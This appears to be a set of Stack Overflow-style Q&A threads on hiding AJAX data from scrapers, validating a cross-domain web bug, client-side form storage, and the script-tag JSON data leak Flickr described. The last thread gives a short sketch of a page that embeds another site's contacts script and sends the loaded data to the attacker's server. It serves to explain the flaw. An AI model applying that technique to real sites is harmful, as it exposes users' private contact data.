I'm working on a new web app where a large amount of content (text, images, meta-data) is requested via an Ajax request.
No auth or login required for a user to access this.
My concern is that you could easily lookup the data source URL and hit it directly outside the app to get large data. In some ways, if you can do this you could probably scrape the static HTML pages elsewhere that also have this content.
Are there any suggestions on methods to obfuscate, hide, or otherwise make it very difficult to access the data directly?
Example: web app HTML page contains a key that is republished every 30 min. On the server side the data is obfuscated based on this key. In order to get the data outside the app you'd need to figure out the data source but also the extra step of scraping the page for a key every 30 min.
I realize there is no 100% way to stop someone, but I'm talking more about deterrence.
Use sessions in your webapp. Make a note (e.g. database entry or some other mechanism which your server-side code can access) when a valid request for the first page is received and include code in the second page to exclude the data when processing a request without a corresponding session entry.
Obviously the specifics on how to do this will vary between languages, but most robust web platforms will support sessions, largely for this type of reason.
If you are wanting to display real-time data and are concerned about scrapers...if this is a big enough concern, then I suggest doing it with flash instead of JS (AJAX). Have the data display withing a flash object. Flash can make real-time send/receive requests to the server just like AJAX. But the benefit of Flash is that the whole stage, data, code, etc.. are within a flash object, which cannot be scraped. Flash object makes the request, you output the stuff as a crypted string of code. Decrypt it within flash and display from there.
"Are there any suggestions on methods to obfuscate, hide, or otherwise make it very difficult to access the data directly?"
Answers your own question because if the data is worth getting it will be obtained because you are obfuscating is merely making it harder to find.
You could in the server side script processing the ajax and returning the data check where the request came from.
Related
I am making a online book reader and my problem is whatever i did to secure book data, it can be easily extracted through firebug.
I tried following things to protect my book content
sent encrypted data from server , and on client side decrypted the data and sent to html Canvas.
but this process also ddnt workout at the end i can get data from firebug.
Is there any way from which i can protect my content?
I can see only one solution that is sending images from server but this also i dont want because there will be too much load on my server. is there a better way to solve this problem?
I have heard about node.js, that it is a javascript based server. can i make a page from canvas(HTML5) at server side and send directly to browser?
If you deliver content via HTML (no matter how you create it) - it will always be visible to the end user via browser's special panels. In this approach all you can do is prevent the 'regular Joe' from simply saving the page or copy/pasting it somewhere else. Technically advanced users will be able to 'read' your content as they wish.
So, you will need to use some embedded objects, like Flash movie, which will load the encrypted text, decrypt it and display. They are not as easy to copy as the HTML ones, but still possible, if one wants it a lot.
Finally, even if you put all your text into images - there is text recognition software available, and your text will be parsed away within minutes of work. So, your only solution is to make it easier to pay you for unlocking the text, rather than hack it away with tools.
I think you just have to accept that any data sent from the server to the client is data that you have given up control over, no way around that. Even if you create a bitmap image on the server and send to the client, it will still be possible to OCR decode the image to get to the text.
Instead, perhaps, focus on methods for motivating people to pay or donate for the content. Or seek other revenue streams.
That being said, web-workers could perhaps be a way to hide data from the DOM as you ask. But since web-workers conversely don't have access to the DOM and hence the canvas, you will need to proxy your canvas calls and FireBug or similar tools will still be able to trace those calls. It would be an exercise left to the reader how to ensure that those calls doesn't contain data that can be easily comprehended.
Just starting to use Highcharts. If I include data in an array within the javascript the data is available for anyone to download when they view the source. This would be the same when data is called, say, from a csv file. Is there a way of protecting the data against copying/download?
No, since HighCharts is a client-side JavaScript library, data available to it is also potentially available to the end user. There really is no way to "secure" it once the data reaches the user's browser, although you can use HTTPS, server-side authentication, etc to at least guarantee in principle that only the intended user receives the data.
If you need to visualize your data while keeping the actual raw data secure, the obvious solution is to render the data on the server and just (in the end) serve up an image or other static content to the user. But then you lose the nice, interactive charts.
You might be able to use Flash or Silverlight to retrieve the data, to make part of the process harder to reverse engineer. This is not securing anything, just making it a bit harder for a determined user.
On the other hand, a user can see the data anyway in the final chart. If they really want to download the data they could painstakingly identify each data point and create their own CSV file, right? You need to figure out what is good enough for your particular use case, and strike the appropriate balance.
Being that HighCharts is a client-side JS system, I don't believe there is a way to get data to it securely. If you just attempt an AJAX call to get data at runtime, a user can see that call and the response. As you said you cannot just populate a variable in the source, as it is visible there.
Try the render charts on server feature:
http://www.highcharts.com/docs/export-module/render-charts-serverside
I am working on implementing a JavaScript web bug that will be inserted into our client's web pages. One of the features our clients would like, is a way to pass pieces of the HTML on their web pages to our server through the web bug. We are using JSONP and the server that is hosting the JavaScript web bug is different than the server hosting the we page. The basic idea is this:
var element = document.getElementById(id);
var html = element.innerHTML;
//Encodes HTML into GET request www.example.com/script?html=encodedhtml
var url = getSrcUrl(html);
document.write(unescape("%3Cscript src='" + url + "' type='text/javascript'%3E%3C/script%3E"));
The security problem is that anyone could make a get request to our server with arbitrary HTML that isn't from the web page that is hosting the web bug. Is there anyway to make this secure?
I know we could check HTTP headers for the referrer, but this can easily be forged. I saw some ideas where the server passed a unique token that had to be returned in the GET request, but it seems like this could be forged too.
My hunch is that what we're trying to do can't be done securely, but I wanted to throw this out to the community to see if there's something clever that can be done. Otherwise, I'm going to have to build a screen scraper that downloads the pages directly from our clients and extracts the relevant HTML for their page.
Thanks for any and all help!
EDIT
To be clear, our client's web pages are public-facing without security. In other words, any Internet user could visit the page and execute the JavaScript bug that submits the HTML fragment.
EDIT 2
An acceptable answer is "this is impossible"! If that is the case, and you give a good explanation of why, I will choose it as the accepted answer.
EDIT 3
What we are building is a kind of Google Analytics system for our clients. We are trying to track visits to unique "items" by each visitor and then automatically collecting information about that item via the HTML fragment. We will then insert information about the item on other pages by injecting the HTML fragment that we collected from the original item. We are trying to do all this without requiring our clients to install anything on their severs and by just including out JavaScript web bug in their HTML.
If you want to ensure something wasn't tampered with, it cannot go through the client unencrypted.
The only ways to do this securely are to:
As you suggest, retrieve the appropriate page server-side
or
Encrypt/sign the HTML before is goes to the client using a key unknown to them, so that the client cannot modify it
Assuming you can get your client's web server to md5 something for you, this seems like a good place to use an md5-hashed signature. Essentially, the client server determines which information it would like to send you, concatenates it all into a string, concatenates that with a secret key, and then md5's the whole thing, and passes the result along with all the rest of its input.
On your server, you take all of the input except that signature, concatenate it together, concatenate the secret key onto that, and md5 it. If it matches the signature, you know it's valid input.
Unfortunately, it looks like you're determining the HTML to send on the client (browser) side. Due to the fact that JavaScript is plainly visible for all to see, you can't really use a secret string.
So, unless it's possible to move that kind of processing to the server side, I think you're out of luck.
I'm working on a web based form builder that uses a mix of Jquery and PHP server side interaction. While the user is building the form I'm trying to determine the best method to store each of one of the form items before all the data is sent to the server. I've looked at the following methods
Javascript arrays
XML document
Send each form item to the server side to be stored in a session
The good, the bad and the ugly
Depends on your application functionality and requirements, but Javascript would probably be the best way. You can use either arrays or objects or whatever in javascript. It's server independent and it will preserve data over a long period of time as long as client session stays present (browser window doesn't close for whatever reason) but this can be quite easily avoided (check my last paragraph).
Using XML documents would be the worst solution because XML is not as well supported on the client side as you might think.
Server side sessions are good and bad. They are fine if you store intermediate results from time to time, so if client session ends because of whatever reason, user doesn't loose all data. But the problem is that it may as well expire on the server.
If I was you, I'd use Javascript storage and if needed occasionally send JSON serialized results to server and persist them there as well (based on business process storig this data somewhere else than session could be a better solution). I'd do the second part (with sever side combination) only if I would know that user will most probably build forms in multiple stages over a longer period of time and multiple client sessions. but can be used for failure preventions as well. Anyway. Javascript is your best bet with possible server-side interaction.
Preserving data between pages on the client
Be aware that it's also possible to preseve data between pages on the client side. Check sessvars library for this. So even if the page gets refreshed or redirected and then returned all this can be stored on the client side between these events like magic. Marvelous any rather tiny library that made my life several times. And lessened application complexity considerably that would otherwise have to be implemented with something more complex.
I used TaffyDB to store data, and it's just wonderfully easy to implement.
Hope this helps you
You may want to check out PersistJS, which exposes a cross-browser persistent storage object. Of course, being persistent, data stored with this library survives sessions, not just page changes.
The latest version (0.2.0) is here – note the version in the above linked post is 0.1.0.
A combination of #1 (although I'd use objects, not arrays necessarily) and #3 would seem like a good approach. Storing the data locally in the browser (#1) makes it immediately accessible. Backing that up with session-based server-side storage defends you from the page being refreshed; you can magically restore the page just as it was.
This flickr blog post discusses the thought behind their latest improvements to the people selector autocomplete.
One problem they had to overcome was how to parse and otherwise handle so much data (i.e., all your contacts) client-side. They tried getting XML and JSON via AJAX, but found it too slow. They then had this to say about loading the data via a dynamically generated script tag (with callback function):
JSON and Dynamic Script Tags: Fast but Insecure
Working with the theory that large
string manipulation was the problem
with the last approach, we switched
from using Ajax to instead fetching
the data using a dynamically generated
script tag. This means that the
contact data was never treated as
string, and was instead executed as
soon as it was downloaded, just like
any other JavaScript file. The
difference in performance was
shocking: 89ms to parse 10,000
contacts (a reduction of 3 orders of
magnitude), while the smallest case of
172 contacts only took 6ms. The parse
time per contact actually decreased
the larger the list became. This
approach looked perfect, except for
one thing: in order for this JSON to
be executed, we had to wrap it in a
callback method. Since it’s executable
code, any website in the world could
use the same approach to download a
Flickr member’s contact list. This was
a deal breaker. (emphasis mine)
Could someone please go into the exact security risk here (perhaps with a sample exploit)? How is loading a given file via the "src" attribute in a script tag different from loading that file via an AJAX call?
This is a good question and this exact sort of exploit was once used to steal contact lists from gmail.
Whenever a browser fetches data from a domain, it send across any cookie data that the site has set. This cookie data can then used to authenticate the user, and fetch any specific user data.
For example, when you load a new stackoverflow.com page, your browser sends your cookie data to stackoverflow.com. Stackoverflow uses that data to determine who you are, and shows the appropriate data for you.
The same is true for anything else that you load from a domain, including CSS and Javascript files.
The security vulnerability that Flickr faced was that any website could embed this javascript file hosted on Flickr's servers. Your Flickr cookie data would then be sent over as part of the request (since the javascript was hosted on flickr.com), and Flickr would generate a javascript document containing the sensitive data. The malicious site would then be able to get access to the data that was loaded.
Here is the exploit that was used to steal google contacts, which may make it more clear than my explanation above:
http://blogs.zdnet.com/Google/?p=434
If I was to put an HTML page on my website like this:
<script src="http://www.flickr.com/contacts.js"></script>
<script> // send the contact data to my server with AJAX </script>
Assuming contacts.js uses the session to know which contacts to send, I would now have a copy of your contacts.
However if the contacts are sent via JSON, I can't request them from my HTML page, because it would be a cross-domain AJAX request, which isn't allowed. I can't request the page from my server either, because I wouldn't have your session ID.
In plain english:
Unauthorised computer code (Javascript) running on people's computers is not allowed to get data from anywhere but the site on which it runs - browsers are obliged to enforce this rule.
There is no corresponding restriction on where code can be sourced from, so if you embed data in code any website the user visits can employ the user's credentials to obtain the user's data.